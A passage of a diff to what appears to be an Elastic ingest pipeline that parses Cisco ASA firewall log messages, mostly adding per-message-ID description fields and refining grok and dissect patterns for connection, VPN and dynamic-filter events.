%{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" + description: "106018" - dissect: if: "ctx._temp_.cisco.message_id == '106020'" field: "message" pattern: "%{event.outcome} IP teardrop fragment (size = %{}, offset = %{}) from %{source.address} to %{destination.address}" + description: "106020" - dissect: if: "ctx._temp_.cisco.message_id == '106021'" field: "message" pattern: "%{event.outcome} %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106021" - dissect: if: "ctx._temp_.cisco.message_id == '106022'" field: "message" pattern: "%{event.outcome} %{network.transport} connection spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106022" - grok: if: "ctx._temp_.cisco.message_id == '106023'" field: "message" + description: "106023" patterns: - ^%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{POSINT:source.port})?\s*(%{GREEDYDATA:_temp_.cisco.source_username} )?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{POSINT:destination.port})?%{DATA}by access.group "%{NOTSPACE:_temp_.cisco.list_id}" - dissect: if: "ctx._temp_.cisco.message_id == '106027'" field: "message" + description: "106027" pattern: '%{} %{event.outcome} src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' - dissect: if: "ctx._temp_.cisco.message_id == '106100'" field: "message" + description: "106100" pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '106102' || ctx._temp_.cisco.message_id == '106103'" field: "message" + description: "106103" pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '111004'" field: "message" + description: "111004" pattern: "%{source.address} end configuration: %{_temp_.cisco.cli_outcome}" - set: field: event.outcome + description: "111004" value: "success" if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" - set: field: event.outcome + description: "111004" value: "failure" if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" - remove: @@ -281,296 +304,374 @@ processors: ignore_missing: true - append: field: event.type + description: "111004" value: "change" if: "ctx._temp_.cisco.message_id == '111004'" - grok: if: "ctx._temp_.cisco.message_id == '111009'" + description: "111009" field: "message" patterns: - "^%{NOTSPACE} '%{NOTSPACE:host.user.name}' executed %{NOTSPACE} %{GREEDYDATA:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '111010'" field: "message" + description: "111010" patterns: - "User '%{NOTSPACE:host.user.name}', running %{QUOTEDSTRING} from IP %{IP:source.address}, executed %{QUOTEDSTRING:_temp_.cisco.command_line_arguments}" - dissect: if: "ctx._temp_.cisco.message_id == '113019'" field: "message" + description: "113019" pattern: "Group = %{}, Username = %{source.user.name}, IP = %{destination.address}, Session disconnected. Session Type: %{}, Duration: %{_temp_.duration_hms}, Bytes xmt: %{source.bytes}, Bytes rcv: %{destination.bytes}, Reason: %{message}" - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "302013, 302015" patterns: - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTSPACE:_temp_.cisco.source_interface}:%{IP:source.address}/%{NUMBER:source.port} \\(%{IP:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\\)(\\(%{NOTSPACE:_temp_.cisco.source_username}\\))? to %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \\(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\\)( \\(%{NOTSPACE:destination.user.name}\\))?%{GREEDYDATA}" - dissect: if: "ctx._temp_.cisco.message_id == '303002'" field: "message" + description: "303002" pattern: "%{network.protocol} connection from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, user %{client.user.name} %{} file %{file.path}" - dissect: if: "ctx._temp_.cisco.message_id == '302012'" field: "message" + description: "302012" pattern: "Teardown %{} %{network.transport} translation from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms}" - grok: if: "ctx._temp_.cisco.message_id == '302020'" field: "message" + description: "302020" patterns: - - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr %{IP:destination.address}/%{NUMBER} (%{DATA})?gaddr %{IP:_temp_.natsrcip}/%{NUMBER} laddr %{IP:source.address}/%{NUMBER}(%{GREEDYDATA})?" + - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{NOTSPACE:_temp_.cisco.destination_username}\\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{NOTSPACE:_temp_.cisco.source_username}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" + pattern_definitions: + NOTCOLON: "[^:]*" + ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" + ECSDESTIPORHOST: "(?:%{IP:destination.address}|%{HOSTNAME:destination.domain})" + MAPPEDSRC: "(?:%{DATA:_temp_.natsrcip}|%{HOSTNAME})" - dissect: if: "ctx._temp_.cisco.message_id == '302022'" field: "message" - pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + description: "302022" + pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" field: "message" + description: "302023" pattern: "Teardown stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms} forwarded bytes %{network.bytes} %{event.reason}" - grok: if: "ctx._temp_.cisco.message_id == '304001'" field: "message" + description: "304001" patterns: - "%{IP:source.address} %{DATA} (%{NOTSPACE}@)?%{IP:destination.address}:%{GREEDYDATA:url.original}" - set: if: "ctx._temp_.cisco.message_id == '304001'" field: "event.outcome" + description: "304001" value: allow - dissect: if: "ctx._temp_.cisco.message_id == '304002'" field: "message" + description: "304002" pattern: "Access %{event.outcome} URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" - - dissect: + - grok: if: "ctx._temp_.cisco.message_id == '305011'" field: "message" - pattern: "Built %{} %{network.transport} translation from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + description: "305011" + patterns: + - Built %{NOTSPACE} %{NOTSPACE:network.transport} translation from %{NOTSPACE:_temp_.cisco.source_interface}:%{IP:source.address}/%{NUMBER:source.port}(\(%{NOTSPACE:source.user.name}\))? to %{NOTSPACE:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} - dissect: if: "ctx._temp_.cisco.message_id == '313001'" field: "message" + description: "313001" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313004'" field: "message" + description: "313004" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" - dissect: if: "ctx._temp_.cisco.message_id == '313005'" field: "message" + description: "313005" pattern: "No matching connection for %{network.transport} error message: %{} on %{_temp_.cisco.source_interface} interface.%{}riginal IP payload: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '313008'" field: "message" + description: "313008" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313009'" field: "message" + description: "313009" pattern: "%{event.outcome} invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '322001'" field: "message" + description: "322001" pattern: "%{event.outcome} MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '338001'" field: "message" + description: "338001" pattern: "Dynamic filter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338001'" field: "server.domain" + description: "338001" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338002'" field: "message" + description: "338002" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338002'" field: "server.domain" + description: "338002" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338003'" field: "message" + description: "338003" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338004'" field: "message" + description: "338004" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338005'" field: "message" + description: "338005" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338005'" field: "server.domain" + description: "338005" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338006'" field: "message" + description: "338006" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338006'" field: "server.domain" + description: "338006" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338007'" field: "message" + description: "338007" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338008'" field: "message" + description: "338008" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338101'" field: "message" + description: "338101" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" - set: if: "ctx._temp_.cisco.message_id == '338101'" field: "server.domain" + description: "338101" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338102'" field: "message" + description: "338102" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338102'" field: "server.domain" + description: "338102" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338103'" field: "message" + description: "338103" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338104'" field: "message" + description: "338104" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338201'" field: "message" + description: "338201" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338201'" field: "server.domain" + description: "338201" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338202'" field: "message" + description: "338202" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338202'" field: "server.domain" + description: "338202" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338203'" field: "message" + description: "338203" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338203'" field: "server.domain" + description: "338203" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338204'" field: "message" + description: "338204" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338204'" field: "server.domain" + description: "338204" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338301'" field: "message" + description: "338301" pattern: "Intercepted DNS reply for domain %{source.domain} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, matched %{_temp_.cisco.list_id}" - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "client.address" + description: "338301" value: "{{destination.address}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "client.port" + description: "338301" value: "{{destination.port}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "server.address" + description: "338301" value: "{{source.address}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "server.port" + description: "338301" value: "{{source.port}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '502103'" field: "message" + description: "502103" pattern: "User priv level changed: Uname: %{host.user.name} From: %{_temp_.cisco.privilege.old} To: %{_temp_.cisco.privilege.new}" - append: if: "ctx._temp_.cisco.message_id == '502103'" field: "event.type" + description: "502103" value: - "group" - "change" - append: if: "ctx._temp_.cisco.message_id == '502103'" field: "event.category" + description: "502103" value: "iam" - dissect: if: "ctx._temp_.cisco.message_id == '507003'" field: "message" + description: "507003" pattern: "%{network.transport} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} terminated by inspection engine, reason - %{message}" - dissect: if: '["605004", "605005"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "605004, 605005" pattern: 'Login %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' - dissect: if: "ctx._temp_.cisco.message_id == '609001'" field: "message" + description: "609001" pattern: "Built local-host %{_temp_.cisco.source_interface}:%{source.address}" - dissect: if: "ctx._temp_.cisco.message_id == '609002'" field: "message" + description: "609002" pattern: "Teardown local-host %{_temp_.cisco.source_interface}:%{source.address} duration %{_temp_.duration_hms}" - dissect: if: '["611102", "611101"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "611102, 611101" pattern: 'User authentication %{event.outcome}: IP address: %{source.address}, Uname: %{host.user.name}' - dissect: if: "ctx._temp_.cisco.message_id == '710003'" field: "message" + description: "710003" pattern: "%{network.transport} access denied by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '710005'" field: "message" + description: "710005" pattern: "%{network.transport} request discarded from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '713049'" field: "message" + description: "713049" pattern: "Group = %{}, IP = %{source.address}, Security negotiation complete for LAN-to-LAN Group (%{}) %{}, Inbound SPI = %{}, Outbound SPI = %{}" - - dissect: + - grok: if: "ctx._temp_.cisco.message_id == '716002'" field: "message" - pattern: "Group %{} User %{source.user.name} IP %{source.address} WebVPN session terminated: %{event.reason}" - - dissect: + description: "716002" + patterns: + - "Group <%{NOTSPACE:_temp_.cisco.webvpn.group_name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> WebVPN session terminated: %{GREEDYDATA:event.reason}." + - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} WebVPN session terminated: %{GREEDYDATA:event.reason}." + - grok: if: "ctx._temp_.cisco.message_id == '722051'" field: "message" - pattern: "Group %{} User %{source.user.name} IP %{source.address} IPv4 Address %{_temp_.cisco.assigned_ip} %{}" + description: "722051" + patterns: + - "Group <%{NOTSPACE:_temp_.cisco.webvpn.group_name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> IPv4 Address <%{IP:_temp_.cisco.assigned_ip}> %{GREEDYDATA}" + - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} IPv4 Address %{IP:_temp_.cisco.assigned_ip} %{GREEDYDATA}" - dissect: if: "ctx._temp_.cisco.message_id == '733100'" field: "message" + description: "733100" pattern: "[%{_temp_.cisco.burst.object}] drop %{_temp_.cisco.burst.id} exceeded. Current burst rate is %{_temp_.cisco.burst.current_rate} per second, max configured rate is %{_temp_.cisco.burst.configured_rate}; Current average rate is %{_temp_.cisco.burst.avg_rate} per second, max configured rate is %{_temp_.cisco.burst.configured_avg_rate}; Cumulative total count is %{_temp_.cisco.burst.cumulative_count}" - dissect: if: "ctx._temp_.cisco.message_id == '734001'" field: "message" + description: "734001" pattern: "DAP: User %{user.email}, Addr %{source.address}, Connection %{_temp_.cisco.connection_type}: The following DAP records were selected for this connection: %{_temp_.cisco.dap_records->}" - dissect: if: "ctx._temp_.cisco.message_id == '805001'" field: "message" + description: "805001" pattern: "Offloaded %{network.transport} for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - dissect: if: "ctx._temp_.cisco.message_id == '805002'" field: "message" + description: "805002" pattern: "%{network.transport} Flow is no longer offloaded for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - split: field: "_temp_.cisco.dap_records" @@ -584,12 +685,19 @@ processors: if: '["302012", "302014", "302016", "302018", "302020", "302021", "302036", "302304", "302306", "609001", "609002"].contains(ctx._temp_.cisco.message_id)' field: "event.action" value: "flow-expiration" + description: "302012, 302014, 302016, 302018, 302020, 302021, 302036, 302304, 302306, 609001, 609002" - grok: field: "message" if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' + description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: - - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?(?:duration %{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes:int})%{GREEDYDATA} - - Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:%{NOTSPACE:_temp_.cisco.source_username})?%{GREEDYDATA} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to 